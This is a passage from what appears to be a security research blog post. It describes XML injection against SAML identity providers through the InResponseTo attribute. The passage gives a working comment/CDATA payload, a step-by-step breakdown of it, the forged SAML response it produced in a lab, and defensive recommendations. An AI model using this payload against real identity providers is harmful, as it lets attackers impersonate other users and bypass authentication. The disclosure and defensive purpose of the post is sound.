<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" NotOnOrAfter="2021-02-12T18:48:18.749Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>
<![CDATA['>
<!-- ]]>
<ncc-elem a="
This payload takes advantage of the fact that the content will be repeated twice within the SAML response produced by the identity provider. A combination of a comment and a CDATA block is used to enclose the identity provider’s assertion, and inject the new assertion. The payload can be broken down into the following components:
-
First, a quote is used to escape from the first InResponseTo attribute, and a new attribute, ‘ncc-injection’, is created. This attribute uses single quotes for the value, so that the double quotes in the XML for the injected assertion can be preserved.
-
The payload within the attribute value includes a closing comment string “–>”, followed by the malicious assertion XML. This is similar to previous payloads, but stops at the SubjectConfirmationData element, as this is where the second InResponseTo attribute occurs.
-
Following the assertion XML, the attribute value includes the string used to open a CDATA block.
-
Then, the single quote and angle bracket close the ncc-injection attribute and Response element.
-
The “<!–” string is used to open a new comment; this comment will enclose the identity provider’s assertion.
-
Then a “]]>” string is included. This will eventually close the CDATA block.
-
Finally, a new element is included, “ncc-elem” with an attribute; this will balance the quote character left by the InResponseTo attribute created by the identity provider. (Note: again, this element may not be required, depending on the XML parser implementation).
When processed by a vulnerable identity provider, the following XML was produced. Note that the first injected assertion, enclosed within the “samlp:Response” “ncc-injection” attribute, is not active. The comment encloses the first part of the identity provider’s assertion, which specifies the “[email protected]” username. Then, when the payload is repeated in the second InResponseTo attribute of the identity provider’s assertion, the “–>” string terminates the comment and the malicious XML becomes active. The malicious XML stops at the SubjectConfirmationData element, where the CDATA block begins; this CDATA block is designed to enclose the second “<!–” comment string, to prevent the remainder of the assertion/response XML from being commented. Finally, the “ncc-elem” element balances the quotes, and the remainder of the identity provider assertion template closes the XML, creating a valid SAML response:
<samlp:Response xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_65a7aa51-521c-46c2-8825-a0b51f730101" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z" Destination="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=" --> lt;saml:Issuer>http://idp.adam.local:8080 lt;/saml:Issuer> lt;samlp:Status> lt;samlp:StatusCode Value= quot;urn:oasis:names:tc:SAML:2.0:status:Success quot;/> lt;/samlp:Status> lt;saml:Assertion ID= quot;_d0a71402-b0c1-453e-93bf-a3a43c50398b quot; IssueInstant= quot;2021-02-11T22:45:54.579Z quot; Version= quot;2.0 quot; xmlns_saml= quot;urn:oasis:names:tc:SAML:2.0:assertion quot; xmlns_xs= quot;http://www.w3.org/2001/XMLSchema quot; xmlns_xsi= quot;http://www.w3.org/2001/XMLSchema-instance quot;> lt;saml:Issuer>http://idp.adam.local:8080 lt;/saml:Issuer> lt;saml:Subject> lt;saml:NameID Format= quot;urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress quot;>[email protected] lt;/saml:NameID> lt;saml:SubjectConfirmation Method= quot;urn:oasis:names:tc:SAML:2.0:cm:bearer quot;> lt;saml:SubjectConfirmationData InResponseTo= quot;_365db265e0bc16c34ffa06ad9b382bbff77541ee55 quot; NotOnOrAfter= quot;2021-02-12T06:51:42.705Z quot; Recipient= quot;http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1 quot;/>--> lt;![CDATA["><!-- ]]><ncc-elem a=""><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/></samlp:Status><saml:Assertion xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_f78b7401-f325-4083-b280-2c55b6ef02e1" Version="2.0" IssueInstant="2021-02-12T05:55:46.978Z"><saml:Issuer>http://idp.adam.local:8080</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="2021-02-12T06:00:46.978Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1" InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" ncc-injection=' -->
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<ds:Signature xmlns_ds="http://www.w3.org/2000/09/xmldsig#">
<ds:SignedInfo>
<ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
<ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/>
<ds:Reference URI="#_65a7aa51-521c-46c2-8825-a0b51f730101">
<ds:Transforms>
<ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
<ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</ds:Transforms>
<ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/>
<ds:DigestValue>20FqC5eEhH0bv6lYVD6Dh1VczuZNg0NeemP0B32GFwc=</ds:DigestValue>
</ds:Reference>
</ds:SignedInfo>
<ds:SignatureValue>O0XjQRmGusm2a2ImysF1wTB2HJSnCNE6aIxKd7cF8ZI+rEyHff4+mbW1uD81hwi4tvdwDjTZZNsnW8djLbAgT8E6dV2HsisXeDRBXvIobi1qW3KUf9k4oO70G0bhVjKWzCAHUo53SGNc6UDuvkijXoxEdyg5US13raeuXsjKs9w=</ds:SignatureValue>
<ds:KeyInfo>
<ds:X509Data>
<ds:X509Certificate>MIICsDCCAhmgAwIBAgIUdbiKONoAtbg996PB63hRqTx/r3kwDQYJKoZIhvcNAQELBQAwajELMAkGA1UEBhMCVVMxCzAJBgNVBAgMAkNBMRIwEAYDVQQHDAlTdW5ueXZhbGUxEjAQBgNVBAoMCU5DQyBHcm91cDESMBAGA1UECwwJU0FNTCBUZXN0MRIwEAYDVQQDDAlsb2NhbGhvc3QwHhcNMjEwMjA4MTgwNTM1WhcNMjIwMjA4MTgwNTM1WjBqMQswCQYDVQQGEwJVUzELMAkGA1UECAwCQ0ExEjAQBgNVBAcMCVN1bm55dmFsZTESMBAGA1UECgwJTkNDIEdyb3VwMRIwEAYDVQQLDAlTQU1MIFRlc3QxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAzcBpN/M96rsY/eVadDGiWsxPtfh2gjx8MXbxitVeCn9/hxp5cMiNY3RLWP6G1unn/jmY5xgs2IOXnWnLCgOTztJ7xY7e55El3GUB2F+f92BsmymNbkmmjW3TS61R7DOmU5Z2c2kigxahhoV2CuZAP4qiJpWI77jK8MU2hnKyBaMCAwEAAaNTMFEwHQYDVR0OBBYEFG4sdyzqVsCQHO8YaigkbVmQE9RdMB8GA1UdIwQYMBaAFG4sdyzqVsCQHO8YaigkbVmQE9RdMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADgYEANF254aZkRGRTtjMLa7/8E6aFhtYCUU86YtRrrBFhslsooPMvwKnKelCdsE5Hp6V50WK2aTVBVI/biZGKCyUDRGZ0d5/dhsMl9SyN87CLwnSpkjcHC/b+I/nc3lrgoUSLPnjq8JUeCG2jkC54eWXMa6Ls2uFTEbUoI+BwJHFAH08=</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</ds:Signature>
<samlp:Status>
<samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/>
</samlp:Status>
<saml:Assertion ID="_d0a71402-b0c1-453e-93bf-a3a43c50398b" IssueInstant="2021-02-11T22:45:54.579Z" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_xs="http://www.w3.org/2001/XMLSchema" xmlns_xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Issuer>http://idp.adam.local:8080</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_365db265e0bc16c34ffa06ad9b382bbff77541ee55" NotOnOrAfter="2021-02-12T06:51:42.705Z" Recipient="http://sp.adam.local/simplesaml/module.php/saml/sp/saml2-acs.php/saml1"/>--><![CDATA['><!-- ]]>
<ncc-elem a=""/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-02-12T05:55:46.978Z" NotOnOrAfter="2021-02-12T06:00:46.978Z">
<saml:AudienceRestriction>
<saml:Audience>http://sp.adam.local/</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-02-12T05:55:46.978Z">
<saml:AuthnContext>
<saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
</saml:Assertion>
</samlp:Response>
Depending on where the InResponseTo attributes are located within the XML document, it may be necessary to adjust the payload to ensure that the XML is correct and well-formed.
There are some caveats to the InResponseTo attacks, however. This particular injection was only successful because the assertion in the SAML response was not signed. Some identity providers sign both the assertion and the SAML response. In this situation, it may only be possible to utilize the second InResponseTo injection point, as any modifications to this assertion after the application of the signature could cause the verification to fail. The specifics of this approach will vary based on the implementation of the identity provider, and the libraries used to parse and sign the XML.
Recommendations
Organizations and services that rely on SAML for authentication should examine identity providers and determine whether they are affected by XML injection vulnerabilities, particularly if the identity provider uses string-based templates to build SAML responses/assertions with user controlled data. Ideally, SAML responses and assertions should be constructed using an appropriate XML library that can safely set user-controlled data in attributes and text nodes.
If it is absolutely necessary to use a string template, or string functions, to include user-controlled data within SAML messages, the data should be strictly validated. If XML characters are detected in the user-input, the authentication attempt should be rejected with an error message. Before insertion to the document, XML encoding should be applied to the data, to ensure that even if the validation is bypassed, the user input cannot inject additional XML.
Additionally, consider enforcing the use of signatures for SAML authentication requests sent from service providers, where possible. If the SAML request signature is validated by the identity provider, any attempt to modify the request to include an XML injection payload (such as those which exploit the InResponseTo attribute) can be detected.
Like this:
Like
Loading...
Stepping Insyde System Management Mode
In October of 2022, Intel’s Alder Lake BIOS source code was leaked online. The leaked code was comprised of firmware components that originated from three sources: I obtained a copy of the leaked code and began to hunt for vulnerabilities. This writeup focuses on the vulnerabilities that I found and…
Hardware & Embedded Systems
Technical advisories
Breaking Pedersen Hashes in Practice
The Pedersen hash function has gained popularity due to its efficiency in the arithmetic circuits used in zero-knowledge proof systems. Hash functions are a crucial primitive in cryptography, and zero-knowledge proof systems often make heavy use of them, for example when computing Merkle tree roots and paths. Instead of being…
Cryptography
Stepping Insyde System Management Mode
Breaking Pedersen Hashes in Practice
A Race to Report a TOCTOU: Analysis of a Bug Collision in Intel SMM
Making New Connections – Leveraging Cisco AnyConnect Client to Drop and Run Payloads
A Primer On Slowable Encoders
